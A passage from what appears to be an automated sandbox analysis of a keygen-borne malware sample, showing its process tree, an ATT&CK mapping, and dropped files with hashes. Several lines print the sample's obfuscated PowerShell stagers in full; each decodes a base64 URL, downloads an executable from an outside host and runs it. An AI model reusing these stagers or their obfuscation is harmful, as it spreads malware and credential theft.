'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1060
                • C:\Users\Public\lwm.exe
                  "C:\Users\Public\lwm.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2544
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                    6⤵
                    • Loads dropped DLL
                    PID:1060
                    • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                      7⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1836
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                        8⤵
                        • Loads dropped DLL
                        PID:1480
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                          "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                          9⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1912
                          • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:1816
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:1076
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 1076 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\899744238767480\\* & exit
                          9⤵
                            PID:2468
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 1076
                              10⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2616
                    • C:\Users\Public\lwm.exe
                      "C:\Users\Public\lwm.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2592
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\74B3.tmp\b1.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:268
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1144
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                3⤵
                • Delays execution with timeout.exe
                PID:1000
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\74B3.tmp\ba.hta"
                3⤵
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1300
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1500
                  • C:\Users\Public\wby.exe
                    "C:\Users\Public\wby.exe"
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:2628
                    • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of SetWindowsHookEx
                      PID:2720
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:2872
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /pid 2872 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\618633613321976\\* & exit
                          8⤵
                            PID:2900
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /pid 2872
                              9⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1428
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2776
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                          "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:3064
                      • C:\Users\Public\wby.exe
                        "C:\Users\Public\wby.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:2920
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\74B3.tmp\ba1.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of WriteProcessMemory
                  PID:1228
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1868

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Modify Existing Service

            1
            T1031

            Defense Evasion

            Modify Registry

            4
            T1112

            Disabling Security Tools

            2
            T1089

            Install Root Certificate

            1
            T1130

            Credential Access

            Credentials in Files

            3
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            2
            T1082

            Collection

            Data from Local System

            3
            T1005

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\freebl3.dll
            • C:\ProgramData\mozglue.dll
            • C:\ProgramData\msvcp140.dll
            • C:\ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\softokn3.dll
            • C:\ProgramData\sqlite3.dll
            • C:\ProgramData\sqlite3.dll
            • C:\ProgramData\vcruntime140.dll
            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a1733a9-c78a-41f9-ba49-7e78bc3e775b
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_39614c4b-9de0-4eec-8eef-2427e3fc6da8
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5c517ae3-40ef-41b1-83a7-22e263268a12
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_62d6075b-257d-4b52-b4b8-079b76c4e640
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_638d71a9-5345-4c51-851c-72a6822e822b
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ded0e88a-1121-454f-bed1-3447da5ff31f
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
            • C:\Users\Admin\AppData\Local\Temp\4byn5RgkFI.exe
            • C:\Users\Admin\AppData\Local\Temp\4byn5RgkFI.exe
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\Keygen.exe
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\b.hta
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\b1.hta
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\ba.hta
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\ba1.hta
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\m.hta
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\m1.hta
            • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\start.bat
            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • C:\Users\Admin\AppData\Local\Temp\IGax9cxEJz.exe
            • C:\Users\Admin\AppData\Local\Temp\IGax9cxEJz.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • C:\Users\Admin\AppData\Local\Temp\PMaGMdTUQH.exe
            • C:\Users\Admin\AppData\Local\Temp\PMaGMdTUQH.exe
            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
            • C:\Users\Admin\AppData\Local\Temp\YI602NCPAu.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            • C:\Users\Public\lwm.exe
            • C:\Users\Public\lwm.exe
            • C:\Users\Public\lwm.exe
            • C:\Users\Public\uzq.exe
            • C:\Users\Public\uzq.exe
            • C:\Users\Public\uzq.exe
            • C:\Users\Public\wby.exe
            • C:\Users\Public\wby.exe
            • C:\Users\Public\wby.exe
            • C:\Windows\temp\ypib34pk.inf
            • \??\PIPE\lsarpc
            • \??\PIPE\srvsvc
            • \??\PIPE\srvsvc
            • \ProgramData\mozglue.dll
            • \ProgramData\mozglue.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\msvcp140.dll
            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\nss3.dll
              MD5

              bfac4e3c5908856ba17d41edcd455a51

              SHA1

              8eec7e888767aa9e4cca8ff246eb2aacb9170428

              SHA256

              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

              SHA512

              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

            • \ProgramData\sqlite3.dll
            • \ProgramData\sqlite3.dll
            • \ProgramData\vcruntime140.dll
            • \ProgramData\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
              MD5

              02cc7b8ee30056d5912de54f1bdfc219

              SHA1

              a6923da95705fb81e368ae48f93d28522ef552fb

              SHA256

              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

              SHA512

              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
            • \Users\Admin\AppData\LocalLow\sqlite3.dll
            • \Users\Admin\AppData\Local\Temp\4byn5RgkFI.exe
            • \Users\Admin\AppData\Local\Temp\74B3.tmp\Keygen.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
            • \Users\Admin\AppData\Local\Temp\IGax9cxEJz.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
            • \Users\Admin\AppData\Local\Temp\PMaGMdTUQH.exe
            • \Users\Admin\AppData\Local\Temp\YI602NCPAu.exe
            • \Users\Admin\AppData\Local\Temp\YI602NCPAu.exe
            • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
            • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
            • \Users\Public\lwm.exe
            • \Users\Public\uzq.exe
            • \Users\Public\uzq.exe
            • \Users\Public\wby.exe
            • \Users\Public\wby.exe
            • memory/268-18-0x0000000000000000-mapping.dmp
            • memory/536-328-0x0000000000000000-mapping.dmp
            • memory/536-379-0x0000000004320000-0x000000000436C000-memory.dmp
              Filesize

              304KB

            • memory/1000-21-0x0000000000000000-mapping.dmp
            • memory/1060-34-0x00000000715B0000-0x0000000071C9E000-memory.dmp
              Filesize

              6.9MB

            • memory/1060-22-0x0000000000000000-mapping.dmp
            • memory/1060-228-0x00000000026A0000-0x00000000026A4000-memory.dmp
              Filesize

              16KB

            • memory/1060-211-0x0000000000000000-mapping.dmp
            • memory/1076-282-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

            • memory/1076-280-0x0000000000417A8B-mapping.dmp
            • memory/1076-279-0x0000000000400000-0x0000000000434000-memory.dmp
              Filesize

              208KB

            • memory/1144-24-0x0000000000000000-mapping.dmp
            • memory/1144-35-0x00000000715B0000-0x0000000071C9E000-memory.dmp
              Filesize

              6.9MB

            • memory/1144-50-0x0000000002880000-0x0000000002881000-memory.dmp
              Filesize

              4KB

            • memory/1228-29-0x0000000000000000-mapping.dmp
            • memory/1300-27-0x0000000000000000-mapping.dmp
            • memory/1416-353-0x0000000000AE0000-0x0000000000AE5000-memory.dmp
              Filesize

              20KB

            • memory/1416-360-0x00000000049F0000-0x00000000049F2000-memory.dmp
              Filesize

              8KB

            • memory/1416-334-0x0000000000000000-mapping.dmp
            • memory/1416-355-0x0000000000A80000-0x0000000000A90000-memory.dmp
              Filesize

              64KB

            • memory/1416-337-0x0000000073820000-0x0000000073F0E000-memory.dmp
              Filesize

              6.9MB

            • memory/1416-354-0x00000000049F0000-0x00000000049F2000-memory.dmp
              Filesize

              8KB

            • memory/1416-338-0x0000000000D10000-0x0000000000D11000-memory.dmp
              Filesize

              4KB

            • memory/1416-351-0x0000000000950000-0x0000000000962000-memory.dmp
              Filesize

              72KB

            • memory/1416-346-0x00000000008F0000-0x00000000008F1000-memory.dmp
              Filesize

              4KB

            • memory/1428-367-0x00000000010E0000-0x00000000010E1000-memory.dmp
              Filesize

              4KB

            • memory/1428-252-0x0000000000000000-mapping.dmp
            • memory/1428-364-0x0000000000000000-mapping.dmp
            • memory/1428-370-0x0000000005420000-0x0000000005421000-memory.dmp
              Filesize

              4KB

            • memory/1428-369-0x0000000002880000-0x0000000002881000-memory.dmp
              Filesize

              4KB

            • memory/1428-368-0x0000000004A40000-0x0000000004A41000-memory.dmp
              Filesize

              4KB

            • memory/1428-366-0x0000000073820000-0x0000000073F0E000-memory.dmp
              Filesize

              6.9MB

            • memory/1480-288-0x0000000002750000-0x0000000002754000-memory.dmp
              Filesize

              16KB

            • memory/1480-275-0x0000000000000000-mapping.dmp
            • memory/1500-30-0x0000000000000000-mapping.dmp
            • memory/1500-36-0x00000000715B0000-0x0000000071C9E000-memory.dmp
              Filesize

              6.9MB

            • memory/1564-77-0x0000000006390000-0x0000000006391000-memory.dmp
              Filesize

              4KB

            • memory/1564-69-0x00000000057B0000-0x00000000057B1000-memory.dmp
              Filesize

              4KB

            • memory/1564-70-0x0000000005860000-0x0000000005861000-memory.dmp
              Filesize

              4KB

            • memory/1564-205-0x0000000006610000-0x0000000006611000-memory.dmp
              Filesize

              4KB

            • memory/1564-13-0x0000000000000000-mapping.dmp
            • memory/1564-201-0x0000000006600000-0x0000000006601000-memory.dmp
              Filesize

              4KB

            • memory/1564-20-0x00000000715B0000-0x0000000071C9E000-memory.dmp
              Filesize

              6.9MB

            • memory/1564-131-0x0000000006490000-0x0000000006491000-memory.dmp
              Filesize

              4KB

            • memory/1564-64-0x0000000005760000-0x0000000005761000-memory.dmp
              Filesize

              4KB

            • memory/1564-84-0x00000000063C0000-0x00000000063C1000-memory.dmp
              Filesize

              4KB

            • memory/1668-56-0x0000000004A50000-0x0000000004A51000-memory.dmp
              Filesize

              4KB

            • memory/1668-19-0x00000000715B0000-0x0000000071C9E000-memory.dmp
              Filesize

              6.9MB

            • memory/1668-38-0x0000000002520000-0x0000000002521000-memory.dmp
              Filesize

              4KB

            • memory/1668-12-0x0000000000000000-mapping.dmp
            • memory/1668-44-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
              Filesize

              4KB

            • memory/1688-0-0x0000000000000000-mapping.dmp
            • memory/1764-5-0x0000000000000000-mapping.dmp
            • memory/1764-4-0x0000000000000000-mapping.dmp
